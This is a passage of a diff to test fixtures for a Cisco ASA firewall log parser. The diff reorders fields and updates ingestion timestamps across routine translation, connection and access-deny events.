"localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364380100Z", + "ingested": "2021-12-14T14:36:23.392364654Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", @@ -16352,25 +16349,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16380,12 +16374,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364384800Z", + "ingested": "2021-12-14T14:36:23.392365058Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", @@ -16399,25 +16396,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16427,12 +16421,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364388900Z", + "ingested": "2021-12-14T14:36:23.392365444Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", @@ -16446,25 +16443,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16474,12 +16468,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364393200Z", + "ingested": "2021-12-14T14:36:23.392365831Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", @@ -16493,25 +16490,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16521,12 +16515,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364398200Z", + "ingested": "2021-12-14T14:36:23.392366363Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", @@ -16540,25 +16537,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16568,12 +16562,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364402900Z", + "ingested": "2021-12-14T14:36:23.392366745Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", @@ -16587,25 +16584,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16615,12 +16609,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364407200Z", + "ingested": "2021-12-14T14:36:23.392367131Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", @@ -16634,25 +16631,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16662,12 +16656,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364411700Z", + "ingested": "2021-12-14T14:36:23.392367520Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", @@ -16681,7 +16678,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16742,7 +16742,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364416800Z", + "ingested": "2021-12-14T14:36:23.392367906Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", @@ -16821,7 +16821,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364421400Z", + "ingested": "2021-12-14T14:36:23.392368291Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", @@ -16846,22 +16846,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" 
@@ -16871,12 +16865,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364425500Z", + "ingested": "2021-12-14T14:36:23.392369497Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30", "code": "305012", "kind": "event", @@ -16890,25 +16887,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -16918,12 +16912,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364430300Z", + "ingested": "2021-12-14T14:36:23.392369981Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30", "code": "305012", "kind": "event", @@ -16937,7 +16934,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -16999,7 +16999,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364436400Z", + "ingested": "2021-12-14T14:36:23.392370368Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", 
@@ -17083,7 +17083,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364441600Z", + "ingested": "2021-12-14T14:36:23.392370757Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -17168,7 +17168,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364446400Z", + "ingested": "2021-12-14T14:36:23.392371152Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318", "code": "302016", "kind": "event", @@ -17252,7 +17252,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.364451300Z", + "ingested": "2021-12-14T14:36:23.392371921Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -17334,7 +17334,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364455800Z", + "ingested": "2021-12-14T14:36:23.392372309Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309", "code": "305011", "kind": "event", @@ -17413,7 +17413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364459500Z", + "ingested": "2021-12-14T14:36:23.392372701Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)", "code": "302013", "kind": "event", 
@@ -17438,22 +17438,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17463,12 +17457,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364464200Z", + "ingested": "2021-12-14T14:36:23.392373143Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30", "code": "305012", "kind": "event", @@ -17482,25 +17479,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17510,12 +17504,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364470200Z", + "ingested": "2021-12-14T14:36:23.392373532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17529,25 +17526,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17557,12 +17551,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364476300Z", + "ingested": "2021-12-14T14:36:23.392373976Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30", "code": "305012", "kind": "event", @@ -17576,25 +17573,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17604,12 +17598,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364482300Z", + "ingested": "2021-12-14T14:36:23.392374380Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17623,25 +17620,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17651,12 +17645,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364488500Z", + "ingested": "2021-12-14T14:36:23.392374772Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30", "code": "305012", "kind": "event", @@ -17670,25 +17667,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17698,12 +17692,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364493100Z", + "ingested": "2021-12-14T14:36:23.392375160Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -17717,25 +17714,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -17745,12 +17739,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364499100Z", + "ingested": "2021-12-14T14:36:23.392375552Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30", "code": "305012", "kind": "event", @@ -17764,7 +17761,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -17828,7 +17828,7 @@ "severity": 6, "duration": 4000000000, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.364504400Z", + "ingested": "2021-12-14T14:36:23.392375940Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I", "code": "302014", "kind": "event", @@ -17910,7 +17910,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364509600Z", + "ingested": "2021-12-14T14:36:23.392376383Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -17991,7 +17991,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364513400Z", + "ingested": "2021-12-14T14:36:23.392376827Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +18072,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364517600Z", + "ingested": "2021-12-14T14:36:23.392377207Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +18153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364539800Z", + "ingested": "2021-12-14T14:36:23.392377593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +18232,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.364544300Z", + "ingested": "2021-12-14T14:36:23.392377973Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18315,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364549500Z", + "ingested": "2021-12-14T14:36:23.392378359Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18396,7 +18396,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364553700Z", + "ingested": "2021-12-14T14:36:23.392378856Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18477,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364557800Z", + "ingested": "2021-12-14T14:36:23.392379243Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18558,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364562Z", + "ingested": "2021-12-14T14:36:23.392379646Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364566600Z", + "ingested": "2021-12-14T14:36:23.392380031Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364570800Z", + "ingested": "2021-12-14T14:36:23.392380419Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364575Z", + "ingested": "2021-12-14T14:36:23.392380815Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364579600Z", + "ingested": "2021-12-14T14:36:23.392381654Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364584300Z", + "ingested": "2021-12-14T14:36:23.392382043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364589Z", + "ingested": "2021-12-14T14:36:23.392382435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364592700Z", + "ingested": "2021-12-14T14:36:23.392383192Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364596400Z", + "ingested": "2021-12-14T14:36:23.392383622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364601Z", + "ingested": "2021-12-14T14:36:23.392384003Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364606800Z", + "ingested": "2021-12-14T14:36:23.392384387Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364612600Z", + "ingested": "2021-12-14T14:36:23.392384777Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364618400Z", + "ingested": "2021-12-14T14:36:23.392385164Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364624100Z", + "ingested": "2021-12-14T14:36:23.392385644Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364628400Z", + "ingested": "2021-12-14T14:36:23.392386078Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364632900Z", + "ingested": "2021-12-14T14:36:23.392386463Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364637200Z", + "ingested": "2021-12-14T14:36:23.392386854Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364642200Z", + "ingested": "2021-12-14T14:36:23.392387238Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
